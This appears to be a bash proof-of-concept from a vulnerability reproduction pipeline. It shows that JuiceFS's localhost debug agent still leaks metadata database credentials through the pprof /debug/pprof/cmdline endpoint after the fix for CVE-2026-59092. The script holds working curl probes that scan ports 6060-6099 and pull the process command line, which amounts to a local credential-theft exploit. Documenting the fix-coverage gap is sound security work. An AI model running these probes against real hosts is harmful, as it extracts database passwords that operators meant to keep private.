#!/bin/bash
set -euo pipefail

# ============================================================================
# CVE-2026-59092 VARIANT: JuiceFS debug agent still exposes pprof via
# DefaultServeMux AFTER the fix (localhost-only residual / fix-coverage gap)
# ============================================================================
# The official fix (commit a46979cdd4082217081ee99b931ddc53d038e47a, PR #7214)
# only replaced the shared DefaultServeMux with a dedicated ServeMux in THREE
# places:
#   - cmd/mount.go            exposeMetrics()        (metrics port)
#   - pkg/fs/http.go          StartHTTPServer()      (WebDAV port)
#   - pkg/sync/cluster.go     startManager()         (sync cluster manager port)
#
# It did NOT touch the *debug agent* started in cmd/main.go:336:
#
#     if !c.Bool("no-agent") {
#         go debugAgentOnce.Do(func() {
#             for port := 6060; port < 6100; port++ {
#                 debugAgent = fmt.Sprintf("127.0.0.1:%d", port)
#                 _ = http.ListenAndServe(debugAgent, nil)   // <-- DefaultServeMux
#             }
#         })
#     }
#
# Because `_ "net/http/pprof"` is imported in cmd/main.go, the pprof handlers
# (including /debug/pprof/cmdline) are registered on DefaultServeMux, and the
# debug agent serves them with a `nil` handler. So on the FIXED version, the
# metrics port correctly returns 404 for pprof, BUT the debug agent port
# (127.0.0.1:6060+) STILL returns 200 for /debug/pprof/cmdline and leaks the
# full process command line, including the metadata engine URL with DB creds.
#
# The debug agent is hardcoded to 127.0.0.1 (no flag makes it bind to 0.0.0.0),
# so this is NOT a remote bypass of the original CVE (which targeted the
# remotely-bindable metrics port). It IS a distinct same-root-cause variant on
# a localhost surface that the fix left uncovered -> a local-hardening /
# fix-coverage gap. A co-located local user (or an SSRF from a co-located web
# service) can still extract metadata credentials from a *fixed* JuiceFS
# process that was not started with --no-agent.
#
# A second, identical residual exists in the Java SDK native lib:
#   sdk/java/libjfs/main.go:573  http.ListenAndServe("127.0.0.1:%d", nil)
# (gated by jConf.Debug || JUICEFS_DEBUG env). Same root cause, same sink.
#
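# Exit code:
#   0 = variant reproduced on the FIXED version (debug agent leaks creds) ->
#       fix-coverage gap confirmed.
#   1 = debug agent does NOT leak on the fixed version, no variant found, or
#       the environment could not be set up (project cache or built binaries
#       missing, Redis unavailable, or a gateway failed to start).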
# ============================================================================

# Portable paths - works from any directory
ROOT="${PRUVA_ROOT:-$(cd "$(dirname "$0")/.." && pwd)}"
LOGS="$ROOT/logs"
VARIANT_DIR="$ROOT/vuln_variant"
mkdir -p "$LOGS" "$VARIANT_DIR"

# Locate the project cache (built binaries + repo) so we reuse, not rebuild.
# The context file path is handed to Python as argv[1] instead of being
# spliced into the program text, so a $ROOT containing quotes or backslashes
# cannot break the snippet. One interpreter call answers both questions:
# it prints project_cache_dir only when "prepared" renders as True, and
# prints nothing otherwise. Any Python/JSON error counts as "not prepared".
PROJECT_CACHE_DIR=""
CACHE_CONTEXT="$ROOT/project_cache_context.json"
if [ -f "$CACHE_CONTEXT" ]; then
    PROJECT_CACHE_DIR=$(python3 -c '
import json
import sys

with open(sys.argv[1]) as fh:
    ctx = json.load(fh)
if str(ctx.get("prepared", False)) == "True":
    print(ctx.get("project_cache_dir", ""))
' "$CACHE_CONTEXT" 2>/dev/null || true)
fi
# Without a prepared cache directory there are no binaries to test against.
if [ -z "$PROJECT_CACHE_DIR" ] || [ ! -d "$PROJECT_CACHE_DIR" ]; then
    echo "ERROR: project cache not prepared; repro binaries unavailable."
    exit 1
fi

REPO_DIR="$PROJECT_CACHE_DIR/repo"
VULN_BIN="$PROJECT_CACHE_DIR/juicefs-vuln"
FIXED_BIN="$PROJECT_CACHE_DIR/juicefs-fixed"
FIXED_COMMIT="a46979cdd4082217081ee99b931ddc53d038e47a"
VULN_COMMIT="f60a90fc0ad52d2bb1f44f38a04d55044fc91d50"

# Both pre-built binaries must exist and be executable; this script never
# builds them itself.
for b in "$VULN_BIN" "$FIXED_BIN"; do
    if [ ! -x "$b" ]; then
        echo "ERROR: missing built binary: $b"
        exit 1
    fi
done

# Record exact tested source identity of the fixed target.
# `git -C` queries the repo without changing this script's own working
# directory (a plain `cd` inside a { } group would persist for the rest of
# the run). If the repo is missing or git fails, the value is left empty.
mkdir -p "$LOGS/vuln_variant"
{
    echo "fixed_commit=${FIXED_COMMIT}"
    echo "fixed_git_rev_parse=$(git -C "$REPO_DIR" rev-parse HEAD 2>/dev/null || true)"
    echo "fixed_binary=$FIXED_BIN"
    echo "vuln_commit=${VULN_COMMIT}"
    echo "vuln_binary=$VULN_BIN"
} > "$LOGS/vuln_variant/fixed_version.txt"

# Test fixture settings: the Redis password doubles as the canary string the
# probes later search for in the leaked command line.
REDIS_PASSWORD="s3cr3tPass"
REDIS_PORT=6379
REDIS_DB=1
printf -v META_URL 'redis://:%s@127.0.0.1:%s/%s' \
    "$REDIS_PASSWORD" "$REDIS_PORT" "$REDIS_DB"
STORAGE_DIR="/tmp/jfs-storage-variant"

# Separate metrics / gateway ports for the vulnerable and the fixed binary.
METRICS_PORT_VULN=9577
GW_PORT_VULN=9100
METRICS_PORT_FIXED=9578
GW_PORT_FIXED=9101

# Credentials exported into the environment of the gateway processes.
export MINIO_ROOT_USER=admin MINIO_ROOT_PASSWORD=12345678

# Banner identifying exactly which commits and binaries are under test.
cat <<EOF
============================================================
CVE-2026-59092 VARIANT: debug agent pprof exposure (post-fix)
============================================================
Vulnerable commit: $VULN_COMMIT
Fixed commit:      $FIXED_COMMIT
VULN binary:       $VULN_BIN
FIXED binary:      $FIXED_BIN

EOF

# --- Helpers --------------------------------------------------------------

# Wait until nothing is listening on the given TCP port.
# Arguments: $1 - TCP port number
#            $2 - optional max number of 1-second polls (default 30)
# Outputs:   a WARN line on stderr if the port is still busy at the end
# Returns:   0 in every case (a busy port is reported, not treated as fatal,
#            so callers running under `set -e` are not aborted)
wait_port_free() {
    local port="$1" timeout="${2:-30}"
    local attempt listing
    for ((attempt = 0; attempt < timeout; attempt++)); do
        # Capture the listing first instead of piping straight into grep -q:
        # under `pipefail`, grep -q exiting on its first match can SIGPIPE
        # the producer, which would make a *busy* port look free.
        listing=$(ss -ltn 2>/dev/null || netstat -ltn 2>/dev/null || true)
        if ! grep -qE "[:.]${port} " <<<"$listing"; then
            return 0
        fi
        sleep 1
    done
    echo "WARN: port ${port} still in use after ${timeout}s" >&2
}

# Kill every juicefs gateway process and wait for all our test ports to free.
# Globals:  VULN_BIN, FIXED_BIN (read) - used as pkill -f match patterns.
#           METRICS_PORT_* / GW_PORT_* (read) - fall back to the script's
#           stock values when not set yet.
# Waits on the first four debug-agent ports plus the metrics/gateway ports.
global_cleanup() {
    local port   # keep the loop variable out of the global namespace
    pkill -9 -f "$VULN_BIN" 2>/dev/null || true
    pkill -9 -f "$FIXED_BIN" 2>/dev/null || true
    sleep 1
    for port in 6060 6061 6062 6063 \
        "${METRICS_PORT_VULN:-9577}" "${METRICS_PORT_FIXED:-9578}" \
        "${GW_PORT_VULN:-9100}" "${GW_PORT_FIXED:-9101}"; do
        wait_port_free "$port"
    done
}

# Make sure a password-protected Redis answers on 127.0.0.1:$REDIS_PORT.
# Globals:  REDIS_PORT, REDIS_PASSWORD, LOGS (read)
# Outputs:  one status line on stdout
# Returns:  0 if Redis answers an authenticated PING (already running or
#           freshly started), 1 otherwise.
# NOTE: when the first PING fails, every redis-server process visible to
# pkill is terminated before a new one is started.
ensure_redis() {
    local attempt
    # Probe the configured port explicitly; without -p the check would hit
    # redis-cli's default port regardless of REDIS_PORT.
    if redis-cli -h 127.0.0.1 -p "$REDIS_PORT" -a "$REDIS_PASSWORD" ping 2>/dev/null | grep -q PONG; then
        echo "Redis already running (auth OK)."
        return 0
    fi
    # Try to start it.
    pkill redis-server 2>/dev/null || true
    sleep 1
    redis-server --port "$REDIS_PORT" --requirepass "$REDIS_PASSWORD" \
        --daemonize yes --logfile "$LOGS/vuln_variant/redis.log" --dir /tmp 2>&1 || true
    # Poll briefly rather than trusting a single fixed sleep: the daemon may
    # need more (or less) than two seconds to accept connections.
    for attempt in 1 2 3 4 5; do
        sleep 1
        if redis-cli -h 127.0.0.1 -p "$REDIS_PORT" -a "$REDIS_PASSWORD" ping 2>/dev/null | grep -q PONG; then
            echo "Redis started (auth OK)."
            return 0
        fi
    done
    echo "ERROR: Redis unavailable."
    return 1
}

# Find the debug agent: scan 127.0.0.1 ports 6060-6099 for one that answers
# /debug/pprof/cmdline with HTTP 200.
# Outputs: the first matching port on stdout, or an empty line if none.
# Returns: 0 in both cases.
find_debug_agent_port() {
    # Locals keep the scan from clobbering same-named top-level variables.
    local p code
    for ((p = 6060; p < 6100; p++)); do
        # curl -w already prints "000" when the connection fails, so the
        # failure is only swallowed here (not replaced by a second "000").
        code=$(curl -s -o /dev/null -w "%{http_code}" --max-time 1 \
            "http://127.0.0.1:${p}/debug/pprof/cmdline" 2>/dev/null || true)
        if [ "$code" = "200" ]; then
            echo "$p"
            return 0
        fi
    done
    echo ""
}

# Probe a debug-agent port for credential leakage.
# $1 = port, $2 = label, $3 = outfile
# Globals: REDIS_PASSWORD (read) - the literal string searched for.
# Prints diagnostics to stderr; echoes ONLY "yes"/"no"/"notfound" to stdout.
# The raw response body is stored in $3 (or the marker NOT_FOUND when no
# port was given).
probe_cmdline() {
    local port="$1" label="$2" outfile="$3"
    local code
    if [ -z "$port" ]; then
        echo "[$label] debug agent: NOT FOUND on 127.0.0.1:6060-6099" >&2
        echo "NOT_FOUND" > "$outfile"
        echo "notfound"
        return
    fi
    # Drop evidence left behind by an earlier run: if curl cannot connect it
    # never rewrites the file, and a stale capture would yield a false "yes".
    rm -f -- "$outfile"
    code=$(curl -s -o "$outfile" -w "%{http_code}" --max-time 3 \
        "http://127.0.0.1:${port}/debug/pprof/cmdline" 2>/dev/null || true)
    code="${code:-000}"
    echo "[$label] debug agent on 127.0.0.1:${port} -> /debug/pprof/cmdline HTTP $code" >&2
    # -F: match the password as a literal string, not as a regex.
    if grep -qF -- "$REDIS_PASSWORD" "$outfile" 2>/dev/null; then
        echo "[$label] CONFIRMED: Redis password '$REDIS_PASSWORD' leaked via debug agent /debug/pprof/cmdline" >&2
        echo "yes"
    else
        echo "[$label] password NOT leaked via debug agent cmdline" >&2
        echo "no"
    fi
}

# Check whether the debug agent answers on a NON-loopback address of this host.
# $1 = debug agent port
# Stdout carries exactly one token: "reachable", "loopback_only" or
# "no_nonloopback_iface"; the human-readable diagnostic goes to stderr.
test_remote_reachability() {
    local port="$1"
    local addr status

    # Preferred source: first global-scope IPv4 address reported by `ip`.
    addr=$(ip -4 -o addr show scope global 2>/dev/null \
        | awk '{print $4}' | head -1 | cut -d/ -f1 || true)
    # Fallback: first address printed by `hostname -I`.
    [ -n "$addr" ] || addr=$(hostname -I 2>/dev/null | awk '{print $1}' || true)

    if [ -z "$addr" ]; then
        echo "no_nonloopback_iface"
        return
    fi

    status=$(curl -s -o /dev/null -w "%{http_code}" --max-time 2 \
        "http://${addr}:${port}/debug/pprof/cmdline" 2>/dev/null || true)
    if [ -z "$status" ]; then
        status="000"
    fi
    echo "debug agent reachability from non-loopback ${addr}:${port} -> HTTP $status" >&2

    case "$status" in
        200) echo "reachable" ;;
        *) echo "loopback_only" ;;
    esac
}

# --- Setup ----------------------------------------------------------------
# Start from a clean slate, then require a working metadata engine.
global_cleanup
if ! ensure_redis; then
    exit 1
fi

mkdir -p "$STORAGE_DIR"
# Format volume (idempotent: re-formatting an existing volume is fine for redis db 1)
# Best effort: a non-zero exit from `format` is deliberately ignored; its
# output is kept in format.log for inspection.
format_args=(format --storage file --bucket "$STORAGE_DIR/" "$META_URL" variantvol)
"$VULN_BIN" "${format_args[@]}" > "$LOGS/vuln_variant/format.log" 2>&1 || true
printf '%s\n' "Volume formatted (or already exists)." ""

# ===========================================================================
# TEST 1: VULNERABLE version - metrics pprof (baseline) + debug agent
# ===========================================================================
echo "============================================================"
echo "TEST 1: VULNERABLE version ($VULN_COMMIT)"
echo "============================================================"
# Make sure no gateway left over from an earlier run still owns our ports.
pkill -9 -f "$VULN_BIN" 2>/dev/null || true
pkill -9 -f "$FIXED_BIN" 2>/dev/null || true
wait_port_free "$METRICS_PORT_VULN"
wait_port_free "$GW_PORT_VULN"
sleep 1

nohup "$VULN_BIN" gateway "$META_URL" "localhost:${GW_PORT_VULN}" \
    --metrics "0.0.0.0:${METRICS_PORT_VULN}" --no-banner \
    > "$LOGS/vuln_variant/gateway-vuln.log" 2>&1 &
VULN_PID=$!
echo "Vulnerable gateway PID: $VULN_PID (debug agent enabled, --no-agent NOT passed)"

# Wait for metrics endpoint (30 polls, one second apart). Each poll is
# bounded by --max-time so a hung connection cannot stall the script.
for i in $(seq 1 30); do
    sleep 1
    ready_code=$(curl -s -o /dev/null -w "%{http_code}" --max-time 3 \
        "http://127.0.0.1:${METRICS_PORT_VULN}/metrics" 2>/dev/null || true)
    if [ "$ready_code" = "200" ]; then
        echo "Vulnerable gateway ready."
        break
    fi
    if ! kill -0 "$VULN_PID" 2>/dev/null; then
        echo "ERROR: vulnerable gateway died"
        tail -n 20 "$LOGS/vuln_variant/gateway-vuln.log" || true
        exit 1
    fi
    if [ "$i" -eq 30 ]; then
        echo "ERROR: vulnerable gateway not ready"
        # Do not leave the still-running gateway behind on this exit path.
        kill "$VULN_PID" 2>/dev/null || true
        exit 1
    fi
done

# Baseline: metrics port pprof (should be 200 on VULNERABLE - the original CVE)
# curl -w prints "000" by itself on connection failure; the fallback only
# covers the case where curl produced no output at all.
VULN_METRICS_PPROF=$(curl -s -o /dev/null -w "%{http_code}" --max-time 3 \
    "http://127.0.0.1:${METRICS_PORT_VULN}/debug/pprof/cmdline" 2>/dev/null || true)
VULN_METRICS_PPROF="${VULN_METRICS_PPROF:-000}"
echo "[VULN] metrics port :${METRICS_PORT_VULN}/debug/pprof/cmdline -> HTTP $VULN_METRICS_PPROF (expect 200 = original CVE surface)"

# Give the debug agent goroutine a moment to bind, then find it.
sleep 1
VULN_DEBUG_PORT=$(find_debug_agent_port)
VULN_DEBUG_LEAK=$(probe_cmdline "$VULN_DEBUG_PORT" "VULN" "$LOGS/vuln_variant/vuln-debugagent-cmdline.txt")
echo "[VULN] debug agent credential leak: $VULN_DEBUG_LEAK"

# Save raw cmdline (NUL -> newline) for evidence
# Skipped when the capture file holds the NOT_FOUND marker instead of data.
if [ -f "$LOGS/vuln_variant/vuln-debugagent-cmdline.txt" ] && [ "$(head -c4 "$LOGS/vuln_variant/vuln-debugagent-cmdline.txt" 2>/dev/null)" != "NOT_" ]; then
    echo "[$VULN_COMMIT debug agent cmdline args]:" | tee "$LOGS/vuln_variant/vuln-debugagent-cmdline-pretty.txt"
    tr '\0' '\n' < "$LOGS/vuln_variant/vuln-debugagent-cmdline.txt" | tee -a "$LOGS/vuln_variant/vuln-debugagent-cmdline-pretty.txt"
fi

# Stop the vulnerable gateway and reap it before the next test starts.
kill "$VULN_PID" 2>/dev/null || true
wait "$VULN_PID" 2>/dev/null || true
sleep 2
echo ""

# ===========================================================================
# TEST 2: FIXED version - metrics pprof (should be 404) + debug agent (variant)
# ===========================================================================
echo "============================================================"
echo "TEST 2: FIXED version ($FIXED_COMMIT)"
echo "============================================================"
# Make sure no gateway left over from an earlier test still owns our ports.
pkill -9 -f "$VULN_BIN" 2>/dev/null || true
pkill -9 -f "$FIXED_BIN" 2>/dev/null || true
wait_port_free "$METRICS_PORT_FIXED"
wait_port_free "$GW_PORT_FIXED"
sleep 1

nohup "$FIXED_BIN" gateway "$META_URL" "localhost:${GW_PORT_FIXED}" \
    --metrics "0.0.0.0:${METRICS_PORT_FIXED}" --no-banner \
    > "$LOGS/vuln_variant/gateway-fixed.log" 2>&1 &
FIXED_PID=$!
echo "Fixed gateway PID: $FIXED_PID (debug agent enabled, --no-agent NOT passed)"

# Wait for the metrics endpoint (30 polls, one second apart). Each poll is
# bounded by --max-time so a hung connection cannot stall the script.
for i in $(seq 1 30); do
    sleep 1
    ready_code=$(curl -s -o /dev/null -w "%{http_code}" --max-time 3 \
        "http://127.0.0.1:${METRICS_PORT_FIXED}/metrics" 2>/dev/null || true)
    if [ "$ready_code" = "200" ]; then
        echo "Fixed gateway ready."
        break
    fi
    if ! kill -0 "$FIXED_PID" 2>/dev/null; then
        echo "ERROR: fixed gateway died"
        tail -n 20 "$LOGS/vuln_variant/gateway-fixed.log" || true
        exit 1
    fi
    if [ "$i" -eq 30 ]; then
        echo "ERROR: fixed gateway not ready"
        # Do not leave the still-running gateway behind on this exit path.
        kill "$FIXED_PID" 2>/dev/null || true
        exit 1
    fi
done

# Fixed metrics port pprof (should be 404 = fix works on the metrics surface)
# curl -w prints "000" by itself on connection failure; the fallback only
# covers the case where curl produced no output at all.
FIXED_METRICS_PPROF=$(curl -s -o /dev/null -w "%{http_code}" --max-time 3 \
    "http://127.0.0.1:${METRICS_PORT_FIXED}/debug/pprof/cmdline" 2>/dev/null || true)
FIXED_METRICS_PPROF="${FIXED_METRICS_PPROF:-000}"
echo "[FIXED] metrics port :${METRICS_PORT_FIXED}/debug/pprof/cmdline -> HTTP $FIXED_METRICS_PPROF (expect 404 = fix covers metrics surface)"

# Fixed metrics still serves /metrics (regression check)
FIXED_METRICS_OK=$(curl -s -o /dev/null -w "%{http_code}" --max-time 3 \
    "http://127.0.0.1:${METRICS_PORT_FIXED}/metrics" 2>/dev/null || true)
FIXED_METRICS_OK="${FIXED_METRICS_OK:-000}"
echo "[FIXED] metrics port /metrics -> HTTP $FIXED_METRICS_OK (expect 200 = no regression)"

# Give the debug agent goroutine a moment to bind, then find and probe it.
sleep 1
FIXED_DEBUG_PORT=$(find_debug_agent_port)
FIXED_DEBUG_LEAK=$(probe_cmdline "$FIXED_DEBUG_PORT" "FIXED" "$LOGS/vuln_variant/fixed-debugagent-cmdline.txt")
echo "[FIXED] debug agent credential leak: $FIXED_DEBUG_LEAK"

# Save raw cmdline (NUL -> newline) for evidence; skipped when the capture
# file holds the NOT_FOUND marker instead of data.
if [ -f "$LOGS/vuln_variant/fixed-debugagent-cmdline.txt" ] && [ "$(head -c4 "$LOGS/vuln_variant/fixed-debugagent-cmdline.txt" 2>/dev/null)" != "NOT_" ]; then
    echo "[$FIXED_COMMIT debug agent cmdline args]:" | tee "$LOGS/vuln_variant/fixed-debugagent-cmdline-pretty.txt"
    tr '\0' '\n' < "$LOGS/vuln_variant/fixed-debugagent-cmdline.txt" | tee -a "$LOGS/vuln_variant/fixed-debugagent-cmdline-pretty.txt"
fi

# Reachability: is the fixed debug agent reachable from a non-loopback IP?
if [ -n "$FIXED_DEBUG_PORT" ]; then
    FIXED_REACHABILITY=$(test_remote_reachability "$FIXED_DEBUG_PORT")
    echo "[FIXED] $FIXED_REACHABILITY"
else
    FIXED_REACHABILITY="no_debug_agent"
fi

# Also enumerate other pprof endpoints on the fixed debug agent (state leak / DoS surface)
# - the index is requested as /debug/pprof/ (an empty suffix); appending "/"
#   again would request /debug/pprof// and only measure a path-cleaning
#   redirect.
# - the CPU profile is limited to one second: the handler's default
#   duration is far longer than the 3s curl timeout, so without it the
#   probe could never observe a status code.
if [ -n "$FIXED_DEBUG_PORT" ]; then
    echo ""
    echo "[FIXED] other pprof endpoints on debug agent 127.0.0.1:${FIXED_DEBUG_PORT}:"
    for ep in "" "heap" "goroutine" "profile?seconds=1" "allocs" "threadcreate" "block"; do
        code=$(curl -s -o /dev/null -w "%{http_code}" --max-time 3 \
            "http://127.0.0.1:${FIXED_DEBUG_PORT}/debug/pprof/${ep}" 2>/dev/null || true)
        code="${code:-000}"
        echo "    /debug/pprof/${ep}: HTTP $code"
    done
fi

# Stop the fixed gateway and reap it before the next test starts.
kill "$FIXED_PID" 2>/dev/null || true
wait "$FIXED_PID" 2>/dev/null || true
sleep 2

# ===========================================================================
# TEST 3: FIXED version WITH --no-agent (proves the residual is disableable)
# ===========================================================================
echo ""
echo "============================================================"
echo "TEST 3: FIXED version WITH --no-agent (mitigation check)"
echo "============================================================"
# Make sure no gateway left over from an earlier test still owns our ports.
pkill -9 -f "$VULN_BIN" 2>/dev/null || true
pkill -9 -f "$FIXED_BIN" 2>/dev/null || true
wait_port_free "$METRICS_PORT_FIXED"
wait_port_free "$GW_PORT_FIXED"
sleep 1
nohup "$FIXED_BIN" gateway "$META_URL" "localhost:${GW_PORT_FIXED}" \
    --metrics "0.0.0.0:${METRICS_PORT_FIXED}" --no-banner --no-agent \
    > "$LOGS/vuln_variant/gateway-fixed-noagent.log" 2>&1 &
NOAGENT_PID=$!

# Unlike tests 1 and 2, a start-up failure here is non-fatal (the verdict
# does not depend on this test), but it must be remembered: an absent debug
# agent only proves something if the gateway was actually up.
NOAGENT_READY=false
for i in $(seq 1 30); do
    sleep 1
    ready_code=$(curl -s -o /dev/null -w "%{http_code}" --max-time 3 \
        "http://127.0.0.1:${METRICS_PORT_FIXED}/metrics" 2>/dev/null || true)
    if [ "$ready_code" = "200" ]; then
        echo "Fixed (--no-agent) gateway ready."
        NOAGENT_READY=true
        break
    fi
    if ! kill -0 "$NOAGENT_PID" 2>/dev/null; then
        echo "ERROR: fixed --no-agent gateway died"
        tail -n 20 "$LOGS/vuln_variant/gateway-fixed-noagent.log" || true
        break
    fi
    if [ "$i" -eq 30 ]; then
        echo "ERROR: fixed --no-agent gateway not ready"
        break
    fi
done
sleep 1
NOAGENT_DEBUG_PORT=$(find_debug_agent_port)
if [ "$NOAGENT_READY" != "true" ]; then
    # No gateway, no evidence: do not report the mitigation as confirmed.
    echo "[FIXED --no-agent] WARNING: gateway never became ready; mitigation check is inconclusive"
    NOAGENT_RESULT="gateway_not_ready"
elif [ -z "$NOAGENT_DEBUG_PORT" ]; then
    echo "[FIXED --no-agent] debug agent NOT listening on 127.0.0.1:6060-6099 (good: --no-agent disables it)"
    NOAGENT_RESULT="disabled"
else
    echo "[FIXED --no-agent] WARNING: debug agent still found on port $NOAGENT_DEBUG_PORT"
    NOAGENT_RESULT="still_running"
fi
# Stop the gateway (if it is still alive) and reap it.
kill "$NOAGENT_PID" 2>/dev/null || true
wait "$NOAGENT_PID" 2>/dev/null || true
sleep 1

# --- Verdict --------------------------------------------------------------
# Human-readable recap of every measurement collected by the three tests.
printf '%s\n' \
    "" \
    "============================================================" \
    "VARIANT VERIFICATION SUMMARY" \
    "============================================================" \
    "VULN metrics pprof:    HTTP $VULN_METRICS_PPROF (original CVE surface)" \
    "VULN debug agent leak: $VULN_DEBUG_LEAK  (port ${VULN_DEBUG_PORT:-none})" \
    "FIXED metrics pprof:   HTTP $FIXED_METRICS_PPROF (fix covers metrics -> expect 404)" \
    "FIXED metrics ok:      HTTP $FIXED_METRICS_OK (no regression -> expect 200)" \
    "FIXED debug agent leak:$FIXED_DEBUG_LEAK  (port ${FIXED_DEBUG_PORT:-none})" \
    "FIXED debug agent reach: $FIXED_REACHABILITY (expect loopback_only)" \
    "FIXED --no-agent:       $NOAGENT_RESULT (expect disabled)" \
    ""

# The variant counts as reproduced only when the FIXED binary's debug agent
# leaked the password; any other probe outcome means "no variant".
case "$FIXED_DEBUG_LEAK" in
    yes)
        VARIANT_ON_FIXED=true
        printf '%s\n' \
            "RESULT: DISTINCT VARIANT CONFIRMED ON FIXED VERSION" \
            "  - The fix (commit $FIXED_COMMIT) does NOT cover the debug agent." \
            "  - cmd/main.go:336 still serves DefaultServeMux (nil handler) on 127.0.0.1:6060+." \
            "  - /debug/pprof/cmdline STILL leaks metadata credentials on the FIXED binary." \
            "  - Surface is localhost-only (not a remote bypass of the original CVE)," \
            "    but it is a local-hardening / fix-coverage gap (co-located user / SSRF)."
        ;;
    *)
        VARIANT_ON_FIXED=false
        printf '%s\n' "RESULT: NO VARIANT on fixed version (debug agent does not leak)."
        ;;
esac

# Write a machine-readable runtime evidence file for downstream encoding.
# The shell-side results are exported and read back by Python from the
# environment, so no value is interpolated into the Python source.
if [ "$VARIANT_ON_FIXED" = "true" ]; then
    VARIANT_ON_FIXED_JSON="true"
else
    VARIANT_ON_FIXED_JSON="false"
fi

# Map a "yes"/anything-else verdict onto the words "true"/"false".
LEAK_BOOL() {
    if [ "$1" = "yes" ]; then
        echo "true"
    else
        echo "false"
    fi
}

export VARIANT_ON_FIXED_JSON
export VULN_COMMIT FIXED_COMMIT
export VULN_METRICS_PPROF VULN_DEBUG_LEAK VULN_DEBUG_PORT
export FIXED_METRICS_PPROF FIXED_METRICS_OK
export FIXED_DEBUG_LEAK FIXED_DEBUG_PORT FIXED_REACHABILITY
export NOAGENT_RESULT

python3 - <<'PY' > "$VARIANT_DIR/variant_runtime_result.json"
import json
import os

env = os.environ.get


def is_true(value):
    # The shell exports the literal word "true" for a positive result.
    return value == "true"


def leaked(value):
    # probe_cmdline reports a confirmed leak as the word "yes".
    return value == "yes"


result = {
    "variant_on_fixed": is_true(env("VARIANT_ON_FIXED_JSON", "false")),
    "vuln_commit": env("VULN_COMMIT", ""),
    "fixed_commit": env("FIXED_COMMIT", ""),
    "vuln_metrics_pprof": env("VULN_METRICS_PPROF", ""),
    "vuln_debug_agent_leak": leaked(env("VULN_DEBUG_LEAK", "")),
    "vuln_debug_port": env("VULN_DEBUG_PORT", ""),
    "fixed_metrics_pprof": env("FIXED_METRICS_PPROF", ""),
    "fixed_metrics_ok": env("FIXED_METRICS_OK", ""),
    "fixed_debug_agent_leak": leaked(env("FIXED_DEBUG_LEAK", "")),
    "fixed_debug_port": env("FIXED_DEBUG_PORT", ""),
    "fixed_debug_reachability": env("FIXED_REACHABILITY", ""),
    "fixed_noagent_result": env("NOAGENT_RESULT", ""),
}
print(json.dumps(result, indent=2))
PY
echo "Runtime evidence written to $VARIANT_DIR/variant_runtime_result.json"


# Cleanup
# Force-stop any gateway still running from either binary, then stop Redis.
# NOTE(review): `pkill redis-server` is not limited to an instance started
# by this script - confirm that is acceptable on shared hosts.
for bin in "$VULN_BIN" "$FIXED_BIN"; do
    pkill -9 -f "$bin" 2>/dev/null || true
done
pkill redis-server 2>/dev/null || true

echo ""
# Exit status mirrors the verdict: 0 = variant reproduced, 1 = not reproduced.
case "$VARIANT_ON_FIXED" in
    true)
        echo "=== Variant reproduced on FIXED version (fix-coverage gap) ==="
        exit 0
        ;;
    *)
        echo "=== No variant reproduced on fixed version ==="
        exit 1
        ;;
esac
